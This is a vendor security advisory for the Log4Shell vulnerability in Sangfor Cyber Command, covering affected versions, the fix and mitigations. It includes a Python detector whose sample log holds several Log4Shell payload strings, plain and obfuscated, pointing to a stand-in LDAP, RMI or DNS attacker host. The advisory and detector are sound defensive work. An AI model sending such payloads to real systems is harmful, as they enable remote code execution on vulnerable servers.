Vulnerability Overview
On 10 December 2021, the Apache Log4j2 Remote Code Execution (RCE) vulnerability CVE-2021-44228, also known as Log4Shell, was publicly disclosed. This vulnerability exists in some previous versions of Sangfor Cyber Command. An attacker can exploit it to execute arbitrary code remotely and gain full control of the Cyber Command server. Sangfor has released a patch for this vulnerability.
No other Sangfor products, including IAG, NGAF, Endpoint Secure, HCI, VDI, SSLVPN, WANO and CM, are affected at this time.
Versions and Fix
Sangfor Cyber Command versions before v3.0.50 are affected. Version 3.0.50 and newer are not affected. The vulnerability is fixed by upgrading Cyber Command to v3.0.50 or v3.0.59. For customers who have "Allow Automatic Updates" enabled, Cyber Command will have installed the update automatically if it is online. For customers who do not have automatic updates enabled, Cyber Command must be updated manually by installing this patch.
Consequences
An attacker can use this vulnerability to execute arbitrary code on the Cyber Command server, potentially gaining complete control of it.
Vulnerability Introduction
The Apache Log4j library used by Cyber Command lets developers log data from within their application. In some cases the data being logged originates from user input, for example an HTTP header or a login form field. If that input contains a lookup string of the form ${jndi:...} and is logged by a vulnerable Log4j version, Log4j resolves the lookup through JNDI: the JVM connects to the attacker-controlled LDAP (or RMI) server named in the string, which can return a reference to a remote Java class that the JVM then loads and executes. This results in RCE on Cyber Command.
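As an added illustration of the lookup mechanism described above (example code written for this page, not Sangfor's or Apache's code), the following Python emulates the subset of Log4j 2's ${...} lookup syntax that attackers used to obfuscate ${jndi:...} strings (lower/upper lookups, ':-' default values, nested lookups, percent-encoding) and scans web-server log lines for them. The log lines, the 198.51.100.7 address and the helper names are constructed for the example. Note that a bare ${ is not by itself evidence of an attack; only a resolved ${jndi: lookup is flagged, as the ${date:yyyy} line shows.

```python
"""Canonicalize Log4j 2 lookup syntax in log lines and flag JNDI lookups.

Constructed example: emulates just enough of Log4j 2's StrSubstitutor
(lower/upper lookups, ':-' defaults, nesting) to peel obfuscation off a
${jndi:...} string so a simple pattern match catches it.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# An innermost ${...}: no nested ${, $ or } inside the braces.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# The lookup we care about once obfuscation is peeled away.
_JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)


def _lookup(body: str) -> Optional[str]:
    """Resolve one lookup body (text between ${ and }) offline.

    Returns the replacement text, or None if the lookup must stay as-is.
    """
    # Log4j treats ':-' as the default-value delimiter, e.g. ${::-j} -> 'j'.
    if ":-" in body:
        name, default = body.split(":-", 1)
    else:
        name, default = body, None
    prefix, _, key = name.partition(":")
    prefix = prefix.lower()  # Log4j lower-cases the lookup prefix
    if prefix == "lower":
        return key.lower()
    if prefix == "upper":
        return key.upper()
    if prefix == "jndi":
        return None  # never resolve; this is what we want to surface
    # env, sys, date, ctx, an empty prefix, ...: treated as unresolvable
    # offline, so they fall back to their default (or stay in place).
    return default


def canonicalize(text: str) -> str:
    """Percent-decode, then resolve nested lookups until nothing changes."""
    text = unquote(text)  # payloads in URLs are often percent-encoded

    def repl(m: "re.Match") -> str:
        resolved = _lookup(m.group(1))
        return m.group(0) if resolved is None else resolved

    while True:
        new = _INNER.sub(repl, text)
        if new == text:
            return new
        text = new


def is_log4shell_probe(line: str) -> bool:
    """True if the line contains a ${jndi:...} lookup after de-obfuscation."""
    return _JNDI.search(canonicalize(line)) is not None


def scan(log_text: str) -> List[Tuple[int, str]]:
    """Return (line_number, canonical_form) for every flagged line."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        canon = canonicalize(line)
        if _JNDI.search(canon):
            hits.append((n, canon))
    return hits


# Constructed access-log lines; 198.51.100.7 is a documentation address.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:13:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:13:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"
10.0.0.9 - - [10/Dec/2021:13:01:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/a}"
10.0.0.9 - - [10/Dec/2021:13:01:21 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.7:1099/a}"
10.0.0.9 - - [10/Dec/2021:13:01:30 +0000] "GET /?x=%24%7Bjndi%3Adns%3A%2F%2F198.51.100.7%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.68"
10.0.0.12 - - [10/Dec/2021:13:02:00 +0000] "GET /${date:yyyy} HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for n, canon in scan(SAMPLE_LOG):
        print(f"line {n}: {canon}")
```

Run it against a real access log by replacing SAMPLE_LOG with the file contents; lines 2 to 5 of the sample are flagged, lines 1 and 6 are not. Real lookups such as ${env:...} are deliberately never resolved against the scanning host, so the scanner cannot itself be tricked into leaking environment values.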
Precautions & Measures
- Upgrade Cyber Command to version 3.0.50 or later.
- Enable automatic updates.
- Make sure that Internet-facing console access to Cyber Command is disabled. If remote operation and maintenance is required, connect to the intranet first through an SSL VPN or a similar method.
- Restrict logins to Cyber Command with an IP address whitelist that allows access only from security operation and maintenance personnel.
Download the Current Version of Cyber Command
Download the following from the Sangfor Cyber Command Community Download page:
- Upgrade file for Cyber Command version 3.0.49 and below
- Latest patch file for Cyber Command
- Full installation file for the latest version of Cyber Command
Source of vulnerability
National Vulnerability Database (NVD): CVE-2021-44228
Sangfor Security Emergency Response External Service
Statement
Any software/patch you download from Sangfor's service page is the copyrighted work of Sangfor and/or its suppliers. Without Sangfor's permission, you may not disclose relevant information to other third parties, and except for service purposes, you may not further repair, modify, distribute, publish, license, transfer, sell the software/patch, try to extract its source code through decompilation or otherwise attempt to extract any or all of the source code. This document does not promise any express, implied, and statutory guarantees, including, but not limited to, warranties of merchantability, non-infringement, or fitness for a particular purpose. Under any circumstances, Sangfor Technologies Inc., or its directly or indirectly controlled subsidiaries shall not be liable for any losses, including direct, indirect, incidental, inevitable loss of business profits or special losses. You shall bear all legal responsibilities arising from your use of this document in any way. Sangfor can modify or update the content and information of this document at any time.